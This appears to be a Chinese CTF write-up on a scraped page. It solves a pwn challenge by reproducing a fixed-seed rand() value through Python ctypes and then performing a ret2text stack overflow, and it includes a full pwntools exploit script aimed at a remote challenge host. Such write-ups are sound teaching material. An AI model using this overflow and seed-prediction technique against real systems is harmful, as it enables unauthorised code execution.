当前位置: 首页 > news >正文

一个动态网站多少钱互联网公司网站模板

一个动态网站多少钱,互联网公司网站模板,可以免费做推广的网站,北京市建设信息网站伪随机数以及ctypes库的初步接触 目录 前言 一、题目 二、解题思路 三、exp 总结 前言 一道简单的ret2text,加上一些伪随机的知识,对于本蒟蒻萌新来说,比较新,值得记录。 一、题目 栈溢出保护、PIE保护都没有开。反汇编后…

伪随机数以及ctypes库的初步接触

目录

前言

一、题目

二、解题思路

三、exp 

总结


前言

一道简单的ret2text,加上一些伪随机的知识,对于本蒟蒻萌新来说,比较新,值得记录。


一、题目

栈溢出保护、PIE保护都没有开。反汇编后重点如下: 


二、解题思路

既然有后门函数,那就想着ret2text就好啦。然而外部可直接写的buf,无法覆写ret。所以实际可栈溢出利用的部分是V0==rand()时if内部的read。然而随机数我们怎么知道呢?——伪随机

当种子一定时,所产生的随机数序列是确定的。可以说srand后的随机数序列是伪随机数。这也是为什么我们在一般编程的时候,随机数种子一般取当前时刻的原因。

——因此我们只需要复现该随机数种子下的随机数即可。

——然而,因为随机函数多种多样,实现方式也各有差异。因此,如果能调用程序使用的随机函数,就可以完美结局这个问题。

这里,参考大神们的解题方法:python的ctypes库

详细可参考:

Python --- ctypes库的使用_擒贼先擒王的博客-CSDN博客

Python 使用 ctypes 调用 C/C++ DLL 动态链接库_ctypes.cdll___弯弓__的博客-CSDN博客

这里试着调用库libc.so.6,来实现rand函数。此外就是经典的ret2text了


三、exp 

from pwn import *
from pwn import p64
from ctypes import *context(arch="amd64",os='linux',log_level="debug")my_libc=cdll.LoadLibrary('libc.so.6')
my_libc.srand(0x39)io=process('./pwn')
io=remote('node1.anna.nssctf.cn',28206)
io.recvuntil(b'name')
payload=str(my_libc.rand()).encode('utf-8')
io.sendline(payload)
io.recvuntil(b'next?\n')
payload=b'a'*(64+8)+p64(0x40028b)+p64(0x4008b2)
#0x40028b是ret;指令的地址,用于调整栈为16字节对齐,这是调用system函数的要求
#0x4008b2是后门函数的地址
io.send(payload)
io.interactive()


总结

伪随机数以及ctypes库的使用!

http://www.zhongyajixie.com/news/24826.html

相关文章:

  • 广告优化师工资一般多少长沙有实力的关键词优化价格
  • 五百丁简历模板官方网站关键词搜索排名公司
  • 微网站建设渠道江门关键词优化公司
  • 佛山外贸网站建设价位推广计划怎么做推广是什么
  • 曹县有没有做网站最新新闻热点事件
  • 重庆做学校网站公司百度实时热搜榜
  • 美食烹饪网站策划书网店培训骗局
  • 赤峰建设银行网站谷歌浏览器app下载
  • 中国专门做统计网站怎么推广软件
  • 手机网站有什么不同电子商务网站建设教程
  • 网站收录量下降百度基木鱼建站
  • 杭州模板网站建设系统网站如何宣传推广
  • 哪几个网站做acm题目微信推广多少钱一次
  • 新洲区城乡建设局网站新手学seo
  • 政府网站建设情况调查百度广告代理商
  • 高端营销型网站万网域名管理入口
  • 建设商业门户网站的重要项目网站
  • 网站环境搭建好后怎么做网站品牌推广的方式
  • saas系统多少钱郑州网站运营实力乐云seo
  • 做建材网站怎么做制作网页的流程步骤
  • 个人备案做企业网站seo网站优化服务商
  • php网站开发软件怎么写软文推广
  • 理县网站建设中国十大软件外包公司排名
  • 做网站需要什么技术吉安seo
  • 六安手机网站建设百度官方app免费下载
  • wordpress博客怎麽用windows优化大师是什么软件
  • vps做网站怎么加速网站性能优化
  • 网站建设问卷营销渠道管理
  • 做夜夜做网站网站开发工具
  • 做网站激励语潍坊住房公积金